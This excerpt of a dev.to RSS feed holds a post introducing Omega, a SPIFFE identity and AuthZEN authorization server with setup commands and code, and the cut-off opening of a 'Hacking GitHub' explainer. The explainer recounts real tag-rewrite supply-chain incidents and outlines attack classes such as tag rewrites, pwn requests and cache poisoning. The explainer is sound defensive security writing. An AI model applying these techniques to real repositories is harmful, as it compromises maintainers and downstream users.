&lt;li&gt;&lt;a href="https://engineering.mercari.com/blog/entry/20251225-mercari-ai-native-company/" rel="noopener noreferrer"&gt;Mercari Engineering: choosing AI-Native&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cyberagent.co.jp/news/detail/id=29442" rel="noopener noreferrer"&gt;CyberAgent: launching the AI Operations Office&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.anthropic.com/engineering/april-23-postmortem" rel="noopener noreferrer"&gt;Anthropic: an update on recent Claude Code quality reports (Apr 23 postmortem)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.infosecurity-magazine.com/news/ai-hallucinations-slopsquatting/" rel="noopener noreferrer"&gt;AI hallucinations create "slopsquatting" supply chain threat (Infosecurity Magazine)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.csoonline.com/article/4167465/supply-chain-attacks-take-aim-at-your-ai-coding-agents.html" rel="noopener noreferrer"&gt;Supply-chain attacks take aim at your AI coding agents (CSO Online)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://stackoverflow.blog/2025/12/26/ai-vs-gen-z/" rel="noopener noreferrer"&gt;AI vs Gen Z: how AI has changed the career pathway for junior developers (Stack Overflow Blog)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cio.com/article/4062024/demand-for-junior-developers-softens-as-ai-takes-over.html" rel="noopener noreferrer"&gt;Demand for junior developers softens as AI takes over (CIO)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.peoplematters.in/news/ai-and-emerging-tech/meta-sets-ai-coding-targets-with-some-teams-aiming-for-75percent-usage-49016" rel="noopener noreferrer"&gt;Meta sets AI coding targets, with some teams aiming for 75% usage (People Matters)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openai.com/index/introducing-codex/" rel="noopener noreferrer"&gt;Introducing Codex (OpenAI)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openai.com/codex/" rel="noopener noreferrer"&gt;Codex AI Coding Partner (OpenAI product page)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openai.com/index/introducing-gpt-5-5/" rel="noopener noreferrer"&gt;Introducing GPT-5.5 (OpenAI)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>engineering</category>
      <category>llm</category>
    </item>
    <item>
      <title>Introducing Omega: SPIFFE Workload Identity + AuthZEN Authorization in a Single Binary</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Fri, 01 May 2026 15:22:55 +0000</pubDate>
      <link>https://dev.to/kanywst/introducing-omega-spiffe-workload-identity-authzen-authorization-in-a-single-binary-48j0</link>
      <guid>https://dev.to/kanywst/introducing-omega-spiffe-workload-identity-authzen-authorization-in-a-single-binary-48j0</guid>
      <description>&lt;p&gt;Standing up workload identity in a real cluster usually means running&lt;br&gt;
four projects: SPIRE for SVID issuance, OPA or Cedar for authorization,&lt;br&gt;
an OIDC provider for federation, and a separate audit pipeline.&lt;/p&gt;

&lt;p&gt;The standards finally caught up. OpenID AuthZEN Authorization API 1.0&lt;br&gt;
was &lt;a href="https://openid.net/authorization-api-1-0-final-specification-approved/" rel="noopener noreferrer"&gt;approved as a Final Specification on 2026-01-12&lt;/a&gt;.&lt;br&gt;
Cedar &lt;a href="https://aws.amazon.com/blogs/opensource/cedar-joins-cncf-as-a-sandbox-project/" rel="noopener noreferrer"&gt;joined CNCF Sandbox on 2025-10-08&lt;/a&gt;&lt;br&gt;
and is in production at Cloudflare, MongoDB, StrongDM, and AWS Bedrock&lt;br&gt;
AgentCore. SPIFFE is the de-facto workload identity model.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/0-draft/omega" rel="noopener noreferrer"&gt;Omega&lt;/a&gt; is my attempt at wiring those&lt;br&gt;
pieces into one Apache-2.0 binary.&lt;/p&gt;
&lt;h2&gt;
  
  
  A few terms first
&lt;/h2&gt;

&lt;p&gt;The rest of the article assumes these terms; skim the table if any are unfamiliar.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Term&lt;/th&gt;
&lt;th&gt;One-line definition&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SPIFFE&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A spec for workload identity. Defines &lt;code&gt;spiffe://trust-domain/path&lt;/code&gt; IDs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SVID&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SPIFFE Verifiable Identity Document. Either an X.509 cert or a JWT.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Workload API&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A local gRPC endpoint a workload calls to fetch its current SVID.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;PDP / PEP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Policy Decision Point answers "allow?". Policy Enforcement Point asks the question.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AuthZEN&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;An OpenID spec for the HTTP+JSON wire format between a PEP and a PDP.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cedar&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A small, analyzable policy language from AWS, now CNCF Sandbox.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h2&gt;
  
  
  What Omega is
&lt;/h2&gt;

&lt;p&gt;One binary with three subcommands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;omega server&lt;/code&gt; runs the control plane: a CA that issues SPIFFE
X.509-SVIDs and JWT-SVIDs, an AuthZEN 1.0 PDP backed by Cedar, an
audit log, and SPIFFE federation.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;omega agent&lt;/code&gt; runs the SPIFFE Workload API on a Unix domain socket
and attests workloads by their UID via &lt;code&gt;peercred&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;omega &amp;lt;CRUD&amp;gt;&lt;/code&gt; is the CLI for domains, policies, and SVIDs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  What ships today
&lt;/h2&gt;

&lt;p&gt;Repo: &lt;a href="https://github.com/0-draft/omega" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega&lt;/a&gt;. Items marked &lt;code&gt;tracked&lt;/code&gt; are&lt;br&gt;
GitHub issues, not features in the source tree.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE X.509-SVID&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE JWT-SVID (JWKS)&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AuthZEN 1.0 PDP (Cedar)&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE federation&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tamper-evident audit&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Postgres backend (HA)&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes operator&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;cert-manager Issuer&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Admin UI&lt;/td&gt;
&lt;td&gt;implemented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI agent delegation&lt;/td&gt;
&lt;td&gt;example&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OIDC IdP federation hub&lt;/td&gt;
&lt;td&gt;tracked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CSI driver&lt;/td&gt;
&lt;td&gt;tracked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PQC (ML-DSA / ML-KEM)&lt;/td&gt;
&lt;td&gt;tracked&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h2&gt;
  
  
  60-second hands-on
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/0-draft/omega
&lt;span class="nb"&gt;cd &lt;/span&gt;omega
make docker-up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;That brings up the control plane on &lt;code&gt;:8080&lt;/code&gt;, two node agents (giving&lt;br&gt;
the same UID two distinct SPIFFE IDs over separate sockets), the&lt;br&gt;
&lt;code&gt;hello-svid&lt;/code&gt; server and client (which mTLS-handshakes and prints the&lt;br&gt;
verified peer SPIFFE ID), and the admin dashboard on &lt;code&gt;:3000&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Hit the AuthZEN endpoint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-sS&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://127.0.0.1:8080/access/v1/evaluation &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s1"&gt;'Content-Type: application/json'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{"subject":{"type":"Spiffe","id":"spiffe://omega.local/example/web"},
       "action":{"name":"GET"},
       "resource":{"type":"HttpPath","id":"/api/foo"}}'&lt;/span&gt;
&lt;span class="c"&gt;# {"decision":false}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Drop a Cedar policy in &lt;code&gt;policies/&lt;/code&gt; and pass &lt;code&gt;--policy-dir policies&lt;/code&gt; to&lt;br&gt;
the server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;permit (
  principal == Spiffe::"spiffe://omega.local/example/web",
  action    == Action::"GET",
  resource  == HttpPath::"/api/foo"
);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Re-run the curl and the response flips to&lt;br&gt;
&lt;code&gt;{"decision":true,"reasons":["policy0"]}&lt;/code&gt;. Tear it down with&lt;br&gt;
&lt;code&gt;make docker-down&lt;/code&gt;.&lt;/p&gt;
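&lt;p&gt;The mental model behind the flip is small: the PDP is deny-by-default, and a permit that matches the full subject/action/resource triple flips the decision. Here is a toy Python sketch of that shape; it is illustrative only, the real PDP evaluates Cedar policies.&lt;/p&gt;

```python
# Toy deny-by-default PDP in the shape of the AuthZEN exchange above.
# A request is allowed only when some permit rule matches the whole
# (subject, action, resource) triple. Illustrative only.
PERMITS = [
    ("spiffe://omega.local/example/web", "GET", "/api/foo"),
]

def evaluate(subject_id, action, resource_id):
    decision = (subject_id, action, resource_id) in PERMITS
    reasons = ["policy0"] if decision else []
    return {"decision": decision, "reasons": reasons}

assert evaluate("spiffe://omega.local/example/web", "GET", "/api/foo")["decision"] is True
assert evaluate("spiffe://omega.local/example/web", "POST", "/api/foo")["decision"] is False
```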
&lt;h2&gt;
  
  
  How the audit log stays tamper-evident
&lt;/h2&gt;

&lt;p&gt;Every write goes through one append path that computes a row hash from&lt;br&gt;
the previous row's hash plus this row's content&lt;br&gt;
(&lt;code&gt;internal/server/storage/audit.go&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// hash = sha256(seq | ts_nano | kind | actor | subject | decision | payload | prev_hash)&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;sha256&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;New&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;fmt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%d|%d|%s|%s|%s|%s|"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Ts&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;UnixNano&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
    &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Kind&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Actor&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Subject&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Decision&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;([]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Payload&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;([]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"|"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;([]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PrevHash&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;AppendAudit&lt;/code&gt; is serialized through a single mutex so the&lt;br&gt;
&lt;code&gt;prev_hash&lt;/code&gt; lookup and the INSERT cannot interleave. A &lt;code&gt;Verify&lt;/code&gt; walk&lt;br&gt;
re-computes every row and reports the first mismatched &lt;code&gt;seq&lt;/code&gt;, so any&lt;br&gt;
deletion or in-place edit shows up the next time you scan.&lt;/p&gt;
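&lt;p&gt;The scheme is small enough to sketch. This is an illustrative Python model of the chain, not Omega's Go code; the row layout is simplified to &lt;code&gt;seq|content|prev_hash&lt;/code&gt;.&lt;/p&gt;

```python
import hashlib

def row_hash(seq, content, prev_hash):
    # simplified version of Omega's
    # sha256(seq | ts | kind | actor | subject | decision | payload | prev_hash)
    h = hashlib.sha256()
    h.update(f"{seq}|{content}|".encode())
    h.update(prev_hash.encode())
    return h.hexdigest()

def append(log, content):
    # single append path: every row chains to the previous row's hash
    prev = log[-1]["hash"] if log else ""
    seq = len(log)
    log.append({"seq": seq, "content": content, "hash": row_hash(seq, content, prev)})

def verify(log):
    # re-compute every row; return the first mismatched seq, or None if intact
    prev = ""
    for row in log:
        if row["hash"] != row_hash(row["seq"], row["content"], prev):
            return row["seq"]
        prev = row["hash"]
    return None

log = []
append(log, "issue-svid spiffe://omega.local/example/web")
append(log, "authzen decision=false resource=/api/foo")
assert verify(log) is None      # intact chain verifies clean
log[0]["content"] = "tampered"  # an in-place edit...
assert verify(log) == 0         # ...surfaces at the first bad seq
```

&lt;p&gt;Because each hash folds in the previous one, a deleted row breaks the recomputation for every row after it, which is exactly what the &lt;code&gt;Verify&lt;/code&gt; walk reports.&lt;/p&gt;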
&lt;h2&gt;
  
  
  AI agent delegation example
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;examples/mcp-a2a-delegation/&lt;/code&gt; directory shows how a human, a&lt;br&gt;
coordinator agent, and a sub-agent chain through Omega. Each hop calls&lt;br&gt;
&lt;code&gt;POST /v1/token/exchange&lt;/code&gt;, which mints a new JWT-SVID whose &lt;code&gt;act&lt;/code&gt; claim&lt;br&gt;
is the previous token's subject. After two hops the leaf token looks&lt;br&gt;
like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"spiffe://omega.local/agents/claude-code/github-tool"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"act"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"spiffe://omega.local/agents/claude-code"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"act"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"spiffe://omega.local/humans/alice"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The tool-server verifies the leaf against Omega's JWKS, checks the&lt;br&gt;
audience, and walks the &lt;code&gt;act&lt;/code&gt; chain. With&lt;br&gt;
&lt;code&gt;--enforce-token-exchange-policy&lt;/code&gt; the Cedar policy gets the final say&lt;br&gt;
on whether each exchange is allowed, and every decision lands in the&lt;br&gt;
audit log.&lt;/p&gt;

&lt;p&gt;This is a reference example today, not an in-tree library.&lt;/p&gt;
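&lt;p&gt;For illustration, walking that nested &lt;code&gt;act&lt;/code&gt; structure (the RFC 8693 actor claim) recovers the delegation chain leaf-first. This sketch operates on already-verified claims; it is not Omega's verifier, which also checks the signature and audience first.&lt;/p&gt;

```python
def delegation_chain(claims):
    # Walk the nested "act" (actor) claims of a decoded token payload,
    # collecting subjects leaf-first: tool, then agent, then human.
    chain = []
    node = claims
    while node is not None:
        chain.append(node["sub"])
        node = node.get("act")
    return chain

leaf = {
    "sub": "spiffe://omega.local/agents/claude-code/github-tool",
    "act": {
        "sub": "spiffe://omega.local/agents/claude-code",
        "act": {"sub": "spiffe://omega.local/humans/alice"},
    },
}
assert delegation_chain(leaf) == [
    "spiffe://omega.local/agents/claude-code/github-tool",
    "spiffe://omega.local/agents/claude-code",
    "spiffe://omega.local/humans/alice",
]
```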

&lt;h2&gt;
  
  
  What comes next
&lt;/h2&gt;

&lt;p&gt;Three things have to land before the project moves off &lt;code&gt;v0.0.x&lt;/code&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;OmegaIdentity&lt;/code&gt; CRD plus operator-to-control-plane mTLS.&lt;/li&gt;
&lt;li&gt;SPIFFE federation bundle authenticity (peer mTLS plus first-time pin) and JWKS federation.&lt;/li&gt;
&lt;li&gt;An OIDC IdP federation adapter, AWS first.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;PQC (ML-DSA / ML-KEM) and a CSI driver are deliberately later. CRL and&lt;br&gt;
OCSP are not on the list at all; short-lived SVIDs plus rotation is&lt;br&gt;
the revocation story. Detailed non-goals (secrets storage, end-user&lt;br&gt;
login UI, service-mesh data plane, SIEM, agent runtime) live in&lt;br&gt;
&lt;a href="https://github.com/0-draft/omega/blob/main/docs/non-goals.md" rel="noopener noreferrer"&gt;&lt;code&gt;docs/non-goals.md&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try it
&lt;/h2&gt;

&lt;p&gt;If you have spent an evening stitching SPIRE to OPA to Keycloak to&lt;br&gt;
Loki, please clone it, run &lt;code&gt;make docker-up&lt;/code&gt;, and tell me where it&lt;br&gt;
breaks.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Repo: &lt;a href="https://github.com/0-draft/omega" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Issues: &lt;a href="https://github.com/0-draft/omega/issues" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega/issues&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Discussions: &lt;a href="https://github.com/0-draft/omega/discussions" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega/discussions&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>spiffe</category>
      <category>authzen</category>
      <category>security</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Hacking GitHub: From Tag Rewrites to Dangling Commits, Where the Git Protocol Trusts You Without Checking</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Thu, 30 Apr 2026 15:02:43 +0000</pubDate>
      <link>https://dev.to/kanywst/hacking-github-from-tag-rewrites-to-dangling-commits-where-the-git-protocol-trusts-you-without-2o4h</link>
      <guid>https://dev.to/kanywst/hacking-github-from-tag-rewrites-to-dangling-commits-where-the-git-protocol-trusts-you-without-2o4h</guid>
      <description>&lt;h2&gt;
  
  
  Intro: Why we got burned twice by the same trick
&lt;/h2&gt;

&lt;p&gt;On 2025-03-14, the GitHub Action &lt;code&gt;tj-actions/changed-files&lt;/code&gt; was hijacked. 23,000 repositories were affected. Base64-encoded AWS / GitHub / PyPI tokens were dumped into public CI logs. CVE-2025-30066.&lt;/p&gt;

&lt;p&gt;About a year later, on 2026-03-19, &lt;code&gt;aquasecurity/trivy-action&lt;/code&gt; was hit by almost the same playbook. Of 76 version tags, 75 were rewritten to point at attacker-controlled commits.&lt;/p&gt;

&lt;p&gt;Every news headline says "supply chain attack". But put the two incidents side by side and the attacked spot is exactly the same: &lt;strong&gt;the &lt;code&gt;v44&lt;/code&gt; portion of &lt;code&gt;uses: org/action@v44&lt;/code&gt;&lt;/strong&gt;, i.e. the commit a git tag is currently pointing to.&lt;/p&gt;

&lt;p&gt;Did you ever quietly assume that a git tag is an immutable fingerprint? It is not. It is a label. You can force-push it. You can rewrite it. The fact that GitHub's UI says "v44" gives you no guarantee that this v44 points to the same commit it pointed to last week.&lt;/p&gt;

&lt;p&gt;This gap is the attack surface. And it is not just a tag issue. It comes from the fact that &lt;strong&gt;the git protocol is designed on the assumption that there is trust between humans and repositories&lt;/strong&gt;. Authors can self-identify. Submodule paths are trusted. Deleted repos are not actually deleted.&lt;/p&gt;

&lt;p&gt;In this article I dissect that trust gap across three layers.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Layer 1: the git protocol itself&lt;/strong&gt; (tag, author, SHA-1, submodule)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 2: the GitHub platform&lt;/strong&gt; (RepoJacking, CFOR, dangling commits)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 3: GitHub Actions&lt;/strong&gt; (pwn request, script injection, cache poisoning, self-hosted runner)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;At the end I provide hands-on demos you can run locally, plus a defense matrix that maps each attack to its mitigations.&lt;/p&gt;




&lt;h2&gt;
  
  
  Prerequisites: terminology
&lt;/h2&gt;

&lt;p&gt;Before diving in, here are the concepts that come back over and over.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Git object&lt;/strong&gt;: git stores every file / tree / commit as an object keyed by SHA-1 hash under &lt;code&gt;.git/objects/&lt;/code&gt;. The whole system runs on the assumption that "if the hash matches, the content matches".&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tag&lt;/strong&gt;: a "label" pointing to a specific commit object SHA. &lt;code&gt;refs/tags/v1.0&lt;/code&gt; is just a file containing a SHA, and it can be rewritten later (&lt;code&gt;git push --force --tags&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Annotated tag vs lightweight tag&lt;/strong&gt;: the former has its own object and can be signed; the latter is just a ref. Most &lt;code&gt;@v1&lt;/code&gt;-style references in GitHub Actions are lightweight tags.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Commit author / committer&lt;/strong&gt;: metadata inside the commit object. You set it freely with &lt;code&gt;user.name&lt;/code&gt; and &lt;code&gt;user.email&lt;/code&gt;. Git itself does not verify it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Verified badge&lt;/strong&gt;: shown by the GitHub UI when "the commit has a GPG / SSH / S/MIME signature, and the key is registered to the author's GitHub account". &lt;strong&gt;Unsigned commits show nothing&lt;/strong&gt; unless vigilant mode is on.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt;&lt;/strong&gt;: a workflow trigger in GitHub Actions. Unlike &lt;code&gt;pull_request&lt;/code&gt;, &lt;strong&gt;it runs in the target repo's context and has access to secrets&lt;/strong&gt;. The intent is "let trusted automation (linters / labelers) run on outside-contributor PRs", but it causes huge incidents when misused.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CFOR (Cross Fork Object Reference)&lt;/strong&gt;: forks share an object store with their parent, so a commit pushed to a fork is reachable from the parent repo's URL. GitHub has classified this as "by design".&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That is enough to read the rest.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 1: the git protocol itself is trust-based
&lt;/h2&gt;

&lt;p&gt;Git is a distributed VCS designed around "we don't agree on things we can't agree on". Conversely, an object you create locally is treated as fact. There is no protocol-level mechanism for a central server to validate content. We will look at this gap from four angles: &lt;strong&gt;what a tag points to (1.1)&lt;/strong&gt;, &lt;strong&gt;the author's identity (1.2)&lt;/strong&gt;, &lt;strong&gt;SHA-1 identity (1.3)&lt;/strong&gt;, and &lt;strong&gt;arbitrary file writes via submodules (1.4)&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 A git tag is just a label (tag rewrite)
&lt;/h3&gt;

